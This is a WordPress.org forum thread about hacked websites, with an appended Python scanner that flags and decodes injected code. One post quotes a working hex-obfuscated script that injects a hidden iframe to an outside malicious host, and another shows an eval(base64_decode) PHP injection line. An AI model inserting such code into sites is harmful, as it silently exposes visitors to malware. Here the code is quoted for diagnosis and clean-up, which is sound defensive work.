WordPress.org

Site hacked? (8 posts)

  1. Fab_DM
    Member
    Posted 3 years ago #

    Hi,
    Today I went to the home page of my site and found this error:

    Parse error: syntax error, unexpected '<' in /home/mhd-01/www.health-bodytips.com/htdocs/wp-config.php on line 93.

    I couldn't reach any of the pages of my site. I checked the config.php file and I found this part on line 93:

    <script type='text/javascript'>
    var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6b726f6b6f64696c6f763535352e75732f622e7068703f74703d33363436363461363235376162663662222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);
    </script>

    I deleted it and now my site is back online but I'm really worried that I might be hacked. And this just before I had to do my 1st backup so I can't even restore a previous version :(

    Was I hacked or just too worried?
    Do I have to check other files to make sure I don't have any virus etc?
    Is there any way to scan the site with an antivirus?

    Thank you in advance!

    Fab

  2. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

  3. Fab_DM
    Member
    Posted 3 years ago #

    Does your reply mean that I've been hacked then? :(

  4. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

    Yes - I think you have.

  5. Fab_DM
    Member
    Posted 3 years ago #

    :(
    Very bad...
    Problem is that I'm not an expert and I don't know how to clean the site. Checking the guides you gave me I don't understand how to do it :(

  6. derker
    Member
    Posted 3 years ago #

    My site was definitely hacked... but I'm not sure why or what it is doing? So far I have found a block of code inserted into the wp-index file and the dashboard.php files...

    What the hack does visibly is basically yank out the CSS on the dashboard so the admin side looks like an unstyled HTML doc... when I opened up the files I found this code inserted at the top:

    <?php /**/ eval(base64_decode("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"));?>

    Any ideas on how to get rid of this or clean my site would be greatly appreciated...

    thx,
    Derek

  7. esmi
    Theme Diva & Forum Moderator
    Posted 3 years ago #

  8. antifmradio
    Member
    Posted 2 years ago #

    Yes, you were hacked
    my Joomla site was hacked with the same code
    I know how it gets there (through your FTP connection)
    but your question Fab_DM
    was how to correct this

    In case it happens next time you need to open your FTP tool
    check the DATE CHANGED on all files
    pull down all the files that were affected on the same date.
    If you have Dreamweaver at this point
    it would help you out A LOT!!

    Also via your FTP tool, look for any IMAGES that were affected same day
    Don't download these images
    just delete them from the server and upload new ones

    Yes it even infects images.

    OK now with Dreamweaver, use the FIND / EDIT ALL function.

    What you need to do is open one of the PHP files in Dreamweaver
    and look at the code
    HIGHLIGHT the code then click EDIT > FIND and REPLACE

    In the top box you should PASTE the code you highlighted
    that code would ONLY be the script that was inserted into your page

    in the BOTTOM BOX
    leave it blank

    now before you hit EDIT you need to tell Dreamweaver to file ALL THE FILES INSIDE THE FOLDER on your computer
    where you downloaded all the files to.

    It will search all pages in that folder
    remove the script info
    then you can SAVE ALL PAGES

    Now you have to do it again for that extra bit of script it added at the BOTTOM of your same PHP pages
    do the steps again with new pasted code

    SAVE ALL PAGES

    reupload and you are done

    now the final step is
    CHANGE ALL PASSWORDS EVERYWHERE including access to your FTP

    if you want to know what this code does just reply
    I'll let ya know
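
For the clean-up described in this thread (check the date changed, then find the inserted code in every downloaded file), here is an added example, not part of any post: a read-only scanner for a local copy of the site that flags the two injection shapes quoted above and decodes each payload without running it. The regexes, function names and sample strings are assumptions constructed for illustration.

```python
import base64
import binascii
import os
import re
import sys
import time

# Shapes of the two injections quoted in this thread (assumed patterns, tune as needed).
HEX_JS = re.compile(
    r'["\']((?:[0-9a-fA-F]{2}){20,})["\'].{0,300}?fromCharCode.{0,200}?eval\s*\(', re.S)
B64_PHP = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']', re.S)

def find_injections(text):
    """Return (kind, decoded_payload) pairs; payloads are decoded, never executed."""
    hits = []
    for m in HEX_JS.finditer(text):
        hits.append(("hex-js", bytes.fromhex(m.group(1)).decode("latin-1")))
    for m in B64_PHP.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1)).decode("latin-1")
        except (binascii.Error, ValueError):
            decoded = "<undecodable>"
        hits.append(("b64-php", decoded))
    return hits

def scan_tree(root, exts=(".php", ".js", ".html", ".htm")):
    """Walk a local copy of the site; yield (path, modified_date, kind, payload)."""
    for folder, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(folder, name)
            with open(path, encoding="latin-1") as fh:
                text = fh.read()
            stamp = time.strftime("%Y-%m-%d", time.localtime(os.path.getmtime(path)))
            for kind, payload in find_injections(text):
                yield path, stamp, kind, payload

# Constructed sample inputs (not the payloads from the thread).
JS_PLAIN = "document.write('<iframe src=\"http://example.invalid/x\" width=\"1\"></iframe>')"
SAMPLE_JS = ("<script type='text/javascript'>var t=\"\";var arr=\"" + JS_PLAIN.encode().hex() +
             "\";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>")
PHP_PLAIN = "echo 'constructed';"
SAMPLE_PHP = '<?php /**/ eval(base64_decode("' + base64.b64encode(PHP_PLAIN.encode()).decode() + '"));?>'

if __name__ == "__main__":
    for row in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*row, sep="\t")
```

Run it against the folder the files were downloaded to; the modified date in each row shows which other files changed on the same day and deserve a manual look.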

Topic Closed

This topic has been closed to new replies.